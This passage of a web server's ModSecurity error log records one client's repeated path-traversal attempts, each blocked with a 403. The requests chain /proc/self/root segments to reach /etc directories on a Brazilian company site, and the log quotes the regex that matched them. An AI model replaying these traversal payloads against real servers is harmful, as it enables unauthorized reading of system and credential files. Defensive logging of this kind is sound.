"OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpZ46lpbStxTqkSkuClwAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:34:49.528647 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.241.46:34650] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpaY6lpbStxTqkSkuCmQAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:34:50.687318 2026] [:error] [pid 29507:tid 140411666392832] [client 74.7.241.46:34652] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpakr9dMAiw-8KANNiMAAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:34:51.965013 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.241.46:34660] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpa9SswJuvopo3lOh3igAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:34:54.495590 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.241.46:34676] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpbrABkC4fWIHEf8EOHAAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:34:55.979561 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.244.31:60372] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhpb9SswJuvopo3lOh3jAAAAIw"]
[Mon Mar 16 17:35:00.926062 2026] [:error] [pid 15061:tid 140411616036608] [client 74.7.241.46:34690] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpdKTCbgAP5jq5TehEuQAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:35:02.424858 2026] [:error] [pid 29802:tid 140411548894976] [client 74.7.241.46:50626] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpds_BxrYCr4hPDw8DAgAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:35:03.599042 2026] [:error] [pid 15568:tid 140411666392832] [client 74.7.241.46:50630] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpd6QpVkWug9HeOt9NagAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:35:04.948909 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.241.46:50632] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpeNSswJuvopo3lOh3kgAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:35:06.189619 2026] [:error] [pid 10651:tid 140411599251200] [client 74.7.241.46:50640] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhperysWC90G-1nBrBdggAAAZE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:35:09.676818 2026] [:error] [pid 15568:tid 140411590858496] [client 74.7.241.46:50654] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpfaQpVkWug9HeOt9NbQAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:35:12.953027 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.241.46:36630] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpgI6lpbStxTqkSkuCpgAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:35:14.316954 2026] [:error] [pid 29802:tid 140411590858496] [client 74.7.241.46:36636] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpgs_BxrYCr4hPDw8DBwAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:35:17.623726 2026] [:error] [pid 29802:tid 140411666392832] [client 74.7.241.46:36638] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhphc_BxrYCr4hPDw8DCwAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:35:20.051133 2026] [:error] [pid 15061:tid 140411557287680] [client 74.7.241.46:55254] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpiKTCbgAP5jq5TehEwgAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:35:31.098497 2026] [:error] [pid 15061:tid 140411741927168] [client 74.7.241.46:55260] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpk6TCbgAP5jq5TehEzgAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:35:32.396700 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.241.46:32982] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhplP9ocpUE4ed4uDwL4wAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:35:35.784151 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.241.46:32996] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpl7ABkC4fWIHEf8EOIAAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:35:37.102157 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.241.46:32998] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpmf9ocpUE4ed4uDwL5gAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:35:38.263112 2026] [:error] [pid 29802:tid 140411741927168] [client 74.7.241.46:38712] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpms_BxrYCr4hPDw8DEwAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:35:39.571703 2026] [:error] [pid 14895:tid 140411565680384] [client 74.7.241.46:38726] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpm1ajLEzk2WiQ-10rCwAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:35:42.874978 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.241.46:38734] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpnv9ocpUE4ed4uDwL7AAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
